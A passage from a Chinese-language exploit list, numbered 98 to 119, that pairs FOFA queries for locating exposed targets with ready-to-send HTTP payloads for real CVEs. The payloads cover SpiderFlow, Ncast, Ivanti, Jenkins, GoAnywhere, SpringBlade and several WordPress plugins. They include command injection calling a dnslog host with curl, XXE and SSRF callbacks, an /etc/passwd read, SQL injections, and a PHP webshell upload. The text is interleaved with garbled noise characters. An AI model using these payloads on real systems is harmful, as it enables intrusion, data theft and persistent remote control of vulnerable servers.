, x5 l1 E' ~& H- ~3 @" L; UX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"3 w+ }4 G  m) f

" f0 O2 R. B& P
0 K) H; b9 k* h; b* P9 f  f98. SpiderFlow爬虫平台远程命令执行9 w9 e+ g' U9 j9 L" D( ~
CVE-2024-01950 J3 ]9 Y0 _# {  }
FOFA:app="SpiderFlow"
' _% W  x" g8 U9 ^' I9 BPOST /function/save HTTP/1.1: f' ]8 ]- K0 E- z% a: D
Host: 192.168.40.130:8088( n% D5 x& ]- ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 l! e0 q. _: x9 i9 z+ {1 T* UConnection: close7 W* n; i3 \" T5 B. p& U: D8 P/ D: z
Content-Length: 121
, }) ~8 N2 [/ A# d* H) {- w2 S* tAccept: */*0 v. O9 F3 `' R/ X$ X3 l( U
Accept-Encoding: gzip, deflate1 _4 L6 q. p2 g0 W% A1 j8 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 T) |- O5 q" Y+ L% h  E# m7 J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8# X- m! D, q# s8 o
X-Requested-With: XMLHttpRequest- c5 c& S, J0 w/ `6 ]' E- l0 D; |

% e" \: y8 I) d, I  t8 p- S0 Mid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
) k7 \) K7 d' p5 k8 r
& L* Y; X; _9 Q; H" Y. e
* B9 I- j. O0 B" J7 r7 f; x99. Ncast盈可视高清智能录播系统busiFacade RCE
5 ~) D/ e9 H& l! P+ J6 F) CCVE-2024-0305) |& Y9 h1 ~0 P! p4 y1 S: t! [
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
. d) z6 e; a5 }3 y+ zPOST /classes/common/busiFacade.php HTTP/1.15 }- T& R$ X0 \0 L$ S/ A7 d
Host: 192.168.40.130:8080
! m. i0 U0 [! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 o8 k  k5 \# ]% m) e* n0 h/ _' ZConnection: close
7 }" K: q- N) b& ^1 UContent-Length: 154' A4 C: Q+ z  X* @( e# B
Accept: */*9 C/ v. X0 T$ l: y' s# E# u
Accept-Encoding: gzip, deflate# w  O$ f7 m# ~( U+ @1 j* c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' n* i) y& `' }0 YContent-Type: application/x-www-form-urlencoded; charset=UTF-8# c3 y: a! ~, h$ j2 v+ _( b( e
X-Requested-With: XMLHttpRequest2 _' m7 K  X8 h( l2 I' v! w/ I% C$ w( ~

. v: ]" ?" |$ R- p# v5 J, Q! w%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
1 A( u* E7 T6 x- @8 S( Z1 j6 W- D9 C6 c. Q  b' r3 ?3 z# o

1 y0 m2 }. ^3 B5 M9 d4 g6 ]100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传. X( S* A  H; m3 q+ x5 u
CVE-2024-0352
% h+ g  g9 e8 _4 b6 cFOFA:icon_hash="874152924"1 o2 W5 ~* z( Z* O: H& z$ `3 g$ d
POST /api/file/formimage HTTP/1.1
6 n7 B" G) Z4 g# Y2 T4 zHost: 192.168.40.130$ C# |. T: H( _. {( [/ c, f/ N  G
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, j( W: ~  T5 O# n0 l( JConnection: close8 c2 {6 C9 Q$ }$ v6 i5 X
Content-Length: 201
( L* {$ m$ f" @+ z% MContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
" ^4 \/ V* U4 ?7 n( IAccept-Encoding: gzip" M- x/ ]  E& q. J' ]8 {1 o% n

/ @/ s5 T1 F# O! w------WebKitFormBoundarygcflwtei4 i; U1 E: a1 U8 e9 f* S
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
" }* p3 C- T. G  E9 i3 u% j: }+ _Content-Type: application/x-php
# S: z2 [; Y. `. L& ?- r
' \! m/ p: w5 Q% R) b/ S* ^$ s6 @3 }2ayyhRXiAsKXL8olvF5s4qqyI2O1 o! _1 ^' s" Q9 a# ^% p
------WebKitFormBoundarygcflwtei--
2 |2 s& X# Y: q5 K! o' c" s0 y6 V/ ?2 m  b8 H( t

# q4 ?! P% `  }% O7 M101. ivanti policy secure-22.6命令注入
% _% z+ ~2 e; @8 u4 HCVE-2024-21887, W4 I& I" S' u) Y, N% ]
FOFA:body="welcome.cgi?p=logo"6 i3 G2 }  z! h5 l+ s; ?8 U
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
* V+ @. G4 `- s5 }8 n) n, w) cHost: x.x.x.xx.x.x.x
, O; a0 G) j; eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: G4 F2 q" I3 u' G2 _/ O7 o3 JConnection: close
' g5 z: r- D5 o" k, \) YAccept-Encoding: gzip
* A  g! N' ~6 f* K& `7 p% A* j; {3 E
* O4 I! ?' ^1 R# m8 |$ h6 B% n
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; p+ K$ d5 S) T. E$ i) N
CVE-2024-21893& ]- Q' i+ J* c2 B+ E8 D' J$ s
FOFA:body="welcome.cgi?p=logo"& P- a9 k. H: }4 B
POST /dana-ws/saml20.ws HTTP/1.1' F  ~" \8 B$ R' ~1 G$ J
Host: x.x.x.x
* r* c; |- U/ M- c  rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 R$ ]2 J$ V' pConnection: close
! |- G+ g! r* Z9 iContent-Length: 792
+ |6 R8 W4 T& W' K( d& k2 \5 m) pAccept-Encoding: gzip
3 n* i, t8 D8 V$ O9 [6 i" Z! Z% p" f1 {" M" L3 ~/ ~: z1 E/ L
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>. b" B, l+ E& q$ _) D

# `$ I6 A, }0 O) a, ^103. Ivanti Pulse Connect Secure VPN XXE1 G& ]) Z3 I  @1 Z2 H- m( L
CVE-2024-22024/ d4 D8 V- Y; W: v- ?! l
FOFA:body="welcome.cgi?p=logo"
# T/ ~$ Q  a* N$ ^4 \. jPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
- g* L9 K# J( WHost: 192.168.40.130:111' o* f$ y# a# R8 w, X6 o
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: F4 c) W0 Y0 {7 T+ I. P6 `
Connection: close! O3 X3 y0 i* T7 ]
Content-Length: 204, j7 `6 W9 t, A$ b
Content-Type: application/x-www-form-urlencoded
6 l9 O7 X2 P$ w4 d* a/ t" ?Accept-Encoding: gzip
% w4 `9 U: ^) V' N; i, ~: h8 W, w, [6 m( q/ d
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==- [7 O- ~  \/ w6 {" `; T

' y, c# b, L3 [8 G  C* X: e& }! w3 E. ?' |+ p
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
9 v5 X+ B8 M" a5 P1 g<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>. U' M9 j1 ?7 X7 N6 l  A% m6 `! \
+ B$ f' I5 ~% N1 w) H# g

  a" r* I& C' H3 H$ |- o3 F5 O  |104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
8 _) K/ l- v* q* U' q  x5 O# U4 CCVE-2024-0569, T, c- y, B4 ~4 [6 u! [2 c5 o
FOFA:title="TOTOLINK"
- x% a8 w8 u1 s+ F1 {- M" _POST /cgi-bin/cstecgi.cgi HTTP/1.1
! f- @( L5 b2 X/ Q; S; [7 i5 z% UHost:192.168.0.1
) d/ P# D- m. R  ^! n1 t5 C/ Y( @Content-Length:41
4 W7 {& ]! E$ i$ R' WAccept:application/json,text/javascript,*/*;q=0.01
: ^: X% s( O, a8 |$ Z) ]X-Requested-with: XMLHttpRequest
$ g2 O7 A, {8 O! c7 cUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36" f6 `/ ^# c+ j6 v8 V6 T) b: e
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
8 h" r- Z1 p! u: G+ k# U2 kOrigin: http://192.168.0.10 ?' }, X0 y6 z) B
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
3 B8 `1 |5 k" @; CAccept-Encoding:gzip,deflate( j& s( K& T9 u% e; _0 j% e' a
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7' \( f+ i- S0 o9 V+ M
Connection:close: ], T! P2 `( y) ~3 W3 Q4 l# R- n
" {+ b7 x9 [" Y
{$ Q( q1 ]7 `3 V( f( w: x5 m7 i* b2 \
"topicurl":"getSysStatusCfg",
% Y. X0 x2 f: H* @; P2 I"token":""
  B' c! c/ {! u1 V: d- J: c}' V1 n7 a& |& b# _5 A: g! F
  ]" [0 Q  W8 o' ~6 }
105. SpringBlade v3.2.0 export-user SQL 注入* S. K; m" t4 p. w, W
FOFA:body="https://bladex.vip"
1 f# Z- V7 ~0 l9 l2 t' X! P$ S& hhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
% j, n1 I7 D* q; [/ Q+ P5 S# g) A; ^, t2 j9 M7 t0 W  }. z6 O, v
106. SpringBlade dict-biz/list SQL 注入; d# q9 E0 Z4 e
FOFA:body="Saber 将不能正常工作"2 L0 b- |, K9 B4 A$ q+ \  l- |
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% |" F" L% R% b6 cHost: your-ip
( \& K; F; K5 Q- y  S9 H) ^, {# VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 J3 _* a1 B" a0 U9 r1 {  m
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
% Z) X3 B7 [% ~8 `Accept-Encoding: gzip, deflate8 Z/ E, }* M: z* }, w
Accept-Language: zh-CN,zh;q=0.9
9 y  N( @$ g5 C, P% t( ]' e, A$ gConnection: close9 z" {% N* m, g! h8 t" c6 D

3 r' c: P6 |3 i5 H% i; U
, R% b& H0 r9 r8 ?2 s107. SpringBlade tenant/list SQL 注入5 ^# u! }6 C/ M8 T' |6 }
FOFA:body="https://bladex.vip"
% H( A$ P- [, yGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 h  W3 K3 p( i$ o6 PHost: your-ip
: L( ?! P/ P1 \: c3 H; Y- F1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ `$ K/ C. w& e  t/ I) @
Blade-Auth:替换为自己的
* K3 m2 M# O4 bConnection: close6 J* g3 _( P. u! C/ C
8 T5 f  V2 s( ~* z
& `  M! O7 Y0 n
108. D-Tale 3.9.0 SSRF
" P) V! c/ n! ~0 RCVE-2024-21642
5 h, s1 Q0 R; S* c' @# F3 f1 M9 z4 yFOFA:"dtale/static/images/favicon.png": q9 i8 F. W% b4 D: H5 q. {4 }. T; w
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.15 f" ^4 |( H" t
Host: your-ip8 V" q4 [  [* d& f2 [4 W6 @8 E/ `5 ?
Accept: application/json, text/plain, */*
2 D( t* R) w% k0 j% KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ @7 y( f. T( D1 ~) q% p
Accept-Encoding: gzip, deflate
/ i4 S) X$ V4 k4 pAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 `( [( c9 c7 I. ?6 K* [9 X; w
Connection: close
& i8 x  Y6 J5 T
6 I" x0 a$ N6 K. B" r' T  i$ ]
3 E2 n  D2 [1 |! D  T109. Jenkins CLI 任意文件读取# }/ H$ I. O: H  i: X+ {* {! @7 N2 }
CVE-2024-238972 s: e  b2 J: x% _0 ^! X  z" }: E- x2 Y9 G
FOFA:header="X-Jenkins"
4 ?3 \# J; {0 E: YPOST /cli?remoting=false HTTP/1.1
6 W1 r8 _3 r/ d" Y8 t* RHost:
2 T, j+ F% i0 T- k! U$ {Content-type: application/octet-stream1 r# ^8 z/ I4 T. }  t' \( D
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
! I8 G( T/ d: g) ISide: upload! B$ f) K/ X  c1 @- v6 v7 C" }  N# G, [
Connection: keep-alive
. x1 d# A- l$ YContent-Length: 163$ o0 _2 w: k- y" \
- \7 l. \" v, \
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'7 A, E! T: s# Y5 B& |
' Y: E* ~6 y, Y4 M4 q

& s7 R( Z, {: f  l3 Y: P% L" {POST /cli?remoting=false HTTP/1.10 i  y) N; W- C4 C1 J
Host:
" A- Z  R- a& T& x5 ?+ B- }# d! TSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% ^8 f& c5 L( ]* p' ?$ b
download/ a* u( M9 G0 f7 _" G' C
Content-Type: application/x-www-form-urlencoded( d& h/ U- S% g) v0 m( J; R
Content-Length: 0$ }1 l( r2 |( U; P" ^$ M+ m" }: W& h
" j' M! r: s8 d

( G7 C9 R! t5 y1 W  L/ LERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
. A" w. Y' Q1 j6 w- }9 Jjava -jar jenkins-cli.jar help2 Y& c: Y/ v0 T3 b; F) |, l
[COMMAND]
( U" I* E( n( E1 V5 |% C: m0 sLists all the available commands or a detailed description of single command.
' Z7 }/ {' {9 s( t* | COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash). V- n) t4 [* V. k+ S
' O6 j. k( j4 ^; M
4 j7 n$ P4 Z/ R' o/ s% x7 K
110. Goanywhere MFT 未授权创建管理员
; [% s2 b+ Z6 @$ QCVE-2024-0204
4 n/ g1 F! z; n, a( |3 t/ NFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
  c9 _# G) @1 t  T( E% AGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.17 W; c; [& j8 D/ ^8 B
Host: 192.168.40.130:8000
) V. i# ]' y1 U" _9 ~User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
7 r0 f( m  J+ WConnection: close) @' t! Q. K/ a( G
Accept: */*' [! j& c. U" B
Accept-Language: en. c; f* N  [* d7 ]! _8 ]) f
Accept-Encoding: gzip
7 p0 @5 N5 K7 `; {5 `+ T9 q5 p
" b# ]$ q9 G) `  v# w( k8 p  F& j/ n" ]
111. WordPress Plugin HTML5 Video Player SQL注入
, c7 ?" u# l; |6 r; r. iCVE-2024-1061
/ M$ C( g: q4 mFOFA:"wordpress" && body="html5-video-player"1 `$ J5 A& `! Q9 M; l+ |
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
& Z* W5 t# E1 \; n% P$ ~6 bHost: 192.168.40.130:112
3 G, x4 Z+ e  R6 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! m3 \  t/ R/ r; y( H9 O
Connection: close
5 `% R9 ]1 T! D( D! s3 Y: wAccept: */*; W0 K! U8 X( `. j" l: d$ ?
Accept-Language: en
- D5 R" G4 W$ P# lAccept-Encoding: gzip/ F  X9 I, ~3 r+ y5 Y7 {
7 T0 `2 V  `# j. @2 ]
" X6 P, Z+ p: X$ v4 e
112. WordPress Plugin NotificationX SQL 注入. D, a/ M) t2 Q3 I# x
CVE-2024-1698
$ y- y4 _7 f+ o, h/ Q7 X& KFOFA:body="/wp-content/plugins/notificationx"
- X3 j" K2 d% }- d1 BPOST /wp-json/notificationx/v1/analytics HTTP/1.1  u9 ~+ Y* ]( x/ s* r/ m2 G. x
Host: {{Hostname}}4 F. i  s1 K# g4 Q/ a% L0 A/ i
Content-Type: application/json' p; Y- X6 B) k1 @& }  S! W

, C" {8 P& {/ s{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
/ E- z6 q) X5 x1 z: z) I  z: Y9 w! E! o! b% o7 f

0 y# K( v. O0 S" E, Y113. WordPress Automatic 插件任意文件下载和SSRF; C, {/ g5 L! g1 I4 e! ]' ~" J9 {
CVE-2024-27954
. U5 B. c; C, U8 rFOFA:"/wp-content/plugins/wp-automatic"- P. @, X: L7 d2 c
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.16 P  g  W, ]2 _6 s+ T
Host: x.x.x.x* V) W6 [. X+ a
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 x" E3 z2 ?$ _' `. f7 m. Q1 ~  e
Connection: close
/ {+ K( v! m& |6 kAccept: */*8 g0 |/ t5 A; R! D+ `
Accept-Language: en
+ J+ O9 f1 e* ~/ ?; uAccept-Encoding: gzip
* S) h/ g) N% c( R5 R& j
3 ]- K3 F2 S4 |; s0 k8 X. m" f$ {. {) @! i; V' P  Q, ]% R2 E1 Z
114. WordPress MasterStudy LMS插件 SQL注入2 K4 x! y  z1 n
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
! B4 G* b& o: H7 oGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1$ N8 l! {: F3 c9 E) U' K8 {
Host: your-ip
1 A9 C( ~& C& s5 ^- D9 x, }' z. SUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36  |$ e% a, @* w' a
Accept-Charset: utf-8
6 N* s6 T7 h! F/ x! N/ X* n7 IAccept-Encoding: gzip, deflate
1 h: X7 T* o, _$ l9 S* a: xConnection: close  u6 _" I% {. p  U3 n6 F

; j" F% ~. L# ^0 [! T# m! i0 o: D, ?  W
115. WordPress Bricks Builder <= 1.9.6 RCE/ U1 v$ `( N) y/ i- h" B
CVE-2024-25600$ N! L, q3 p: }2 T) v0 b
FOFA: body="/wp-content/themes/bricks/"
/ {+ O8 |% [8 M+ v2 b/ I# ^6 N第一步,获取网站的nonce值5 d& D9 g" D1 j- J8 |* P6 {5 C
GET / HTTP/1.18 O  }: w( V1 k8 \) x1 `
Host: x.x.x.x
& E& p; D: `8 b2 n6 O  q" X6 FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36; b4 u( F: }, E) K5 _
Connection: close
% Q% e, C. R3 h4 ^Accept-Encoding: gzip
0 h' Q8 B: X, b! L& U: E. D
- R2 {: J7 p, J; u. i) `$ ^' e" Z# M, v! f, H
第二步替换nonce值,执行命令2 ]/ b, z$ p" [% ^- k
POST /wp-json/bricks/v1/render_element HTTP/1.1) g/ b* y7 a, e( L
Host: x.x.x.x" A  `; }4 L0 _2 r! |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 p& Q% F7 C" u! G. e( \& H0 g
Connection: close
& |5 d$ h- J7 X( C* @: V& c( X6 s* tContent-Length: 356* j" j- Q0 K# x1 `
Content-Type: application/json1 P6 L3 F! J8 q# h
Accept-Encoding: gzip
, i% ~* k6 L# @* y/ J6 t" M  v% {
. W$ n7 d7 q- G4 i) W2 z6 c{
- ~6 I+ K2 `: A7 G0 E# k"postId": "1",2 _' u, }2 m' U( b; G+ F# V  O
  "nonce": "第一步获得的值",
6 i% l0 O* f2 [3 c5 D) l  "element": {
0 R+ B( E' Z( s0 G; o, b    "name": "container",
3 h3 @! p4 N1 ^    "settings": {: \2 {: F: n/ N  `) F& a/ J/ ]
      "hasLoop": "true",% l/ v' d; _8 h. [. |
      "query": {
& i9 A. M# `$ g; w' L* {        "useQueryEditor": true,1 E7 V4 q" R* R7 u9 r, S
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",/ E) X( Y: D9 X) o: y
        "objectType": "post"3 w7 U! i& V8 j; T
      }% f% v: ^0 @  ^  R0 U
    }4 [1 j. `& H! x' |2 F5 @
  }
4 v6 `+ `$ Y6 p. U/ ^: A}
- G+ F1 R9 }! F/ r- m! I4 X
# m( g2 C2 Z5 _* O
# T% r% d0 M- O. H) @3 l116. wordpress js-support-ticket文件上传+ c9 ?6 n" m' L# ^
FOFA:body="wp-content/plugins/js-support-ticket"
6 b8 M+ w6 A; T$ p; Q7 lPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
6 f9 t; m" p* Q4 r1 mHost:( f! @2 K9 V/ e3 q6 y- t: Z- j$ w
Content-Type: multipart/form-data; boundary=--------767099171) S- a  b% j/ d# s2 m
User-Agent: Mozilla/5.0! p- V/ m/ f8 z) O
' a4 J$ y! w; D; ]: Y
----------767099171& O3 p, Z- F: l6 d0 q
Content-Disposition: form-data; name="action"0 V( h+ z5 E: ]2 z
configuration_saveconfiguration" }/ ]0 M7 W6 @
----------7670991710 W. N7 M" {& v& |) W3 B( R! |4 A
Content-Disposition: form-data; name="form_request"
5 `# H" c$ b( L5 `jssupportticket
! M# z/ G, l+ V4 V. f$ F3 @----------767099171) T( f0 }' `: \: ], E4 ^
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
$ ]/ u) @- c) E. l. lContent-Type: image/png/ N7 o/ j: d$ D0 o# e
----------767099171--
$ X1 P+ ]: K; P0 t( K
- A& z% g' k: Z  l+ c0 b& |9 o# Q( @3 B
117. WordPress LayerSlider插件SQL注入
2 C. O# m7 i# k) y% A/ c* j% hversion:7.9.11 – 7.10.0+ r/ j( r" Z4 b
FOFA:body="/wp-content/plugins/LayerSlider/"
1 R3 H( a1 d8 S& W* ?GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
3 `$ a" a. ~7 ^Host: your-ip8 u0 g# J; s; [. N2 q" @( N. z2 Y4 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. ^6 u' t+ M- FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 T4 y- z0 z) M# e9 o2 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  u: C, t/ ?) s5 ]- b* h
Accept-Encoding: gzip, deflate, br
' B+ `# h4 e. l5 N8 x( b5 p0 KConnection: close
8 Q$ V( w6 f/ u# t, o5 Q% }# {" lUpgrade-Insecure-Requests: 19 x5 T' ^; u2 B& g+ \+ X
* U/ X& P- s% S% Z5 J/ T! y  T
: h! `4 R2 M7 L$ I
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
3 H' A3 d) d5 b" j4 i) b- q! D) q7 tCVE-2024-0939
$ Y% l3 x, j" D, KFOFA:title="Smart管理平台". w% `: H2 n6 U6 P% C+ N8 E
POST /Tool/uploadfile.php? HTTP/1.1
: O& W0 f% _; C5 g. }  v" {Host: 192.168.40.130:8443
# W, q( v9 U, DCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8! L4 R9 _8 W- I* j1 L- J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0+ ]/ r9 a5 I  A8 U3 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 u$ E- ~% A; Y6 V* V7 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, G, z5 R* t- ^
Accept-Encoding: gzip, deflate
5 u* |% T1 {: a& N! cContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
9 N8 T6 U/ u( u2 }Content-Length: 405
+ o7 I+ {9 G. O5 t  \% E+ _Origin: https://192.168.40.130:8443
9 D; H5 d$ Z; HReferer: https://192.168.40.130:8443/Tool/uploadfile.php, w$ }$ u; S+ I! w+ R  m
Upgrade-Insecure-Requests: 1
% m- s$ S/ {, F. W7 d  }Sec-Fetch-Dest: document- @$ N4 [7 J# d3 z( t3 |
Sec-Fetch-Mode: navigate. D, [6 B5 C5 {8 |' E
Sec-Fetch-Site: same-origin
6 k0 m3 C9 [" }Sec-Fetch-User: ?1: @% l7 A4 e3 O$ p- O# q$ d2 h
Te: trailers
$ D! Y2 a0 e) |4 }- e9 mConnection: close
6 u4 f: f/ M; s: I) Y+ I
6 a' s0 a5 `8 z: U* [0 y# y% y-----------------------------13979701222747646634037182887: E' B+ Q2 b9 }' P  F
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
0 u+ Z; K( W. J0 J  u+ o- S( DContent-Type: application/octet-stream3 r# Y) _9 n# k2 `! p
/ B! i" ?4 r# F  `2 U' _" P
<?php
5 p& d6 T/ M. i$ V% {5 k2 dsystem($_POST["passwd"]);2 u2 U: M# l7 P. p
?>
: c% \: t* v  {/ v  }6 b-----------------------------13979701222747646634037182887
  A2 M: ~* X- `) ZContent-Disposition: form-data; name="txt_path"2 z0 b6 `3 w% M+ z
9 y; P, P! i- S& ?! d0 C
/home/src.php3 Y. e" h" W8 g& R0 ?, R7 y
-----------------------------13979701222747646634037182887--" d2 k7 z) p: B8 v! A4 A4 k" T
" o! h3 i6 m7 F# }) h
+ n+ U- R6 }4 C% e
访问/home/src.php
7 j# P! v( }/ n8 U4 ~' Q4 Y' E/ m. Y* P) S
119. 北京百绰智能S20后台sysmanageajax.php sql注入- E# i3 e2 K0 Q- U; x5 C% ~
CVE-2024-1254. k! E$ `3 _1 L# `
FOFA:title="Smart管理平台"3 Z% G. ]! \4 ]% K( C  i( `
先登录进入系统,默认账号密码为admin/admin; Z+ e5 P: U2 A( @+ r
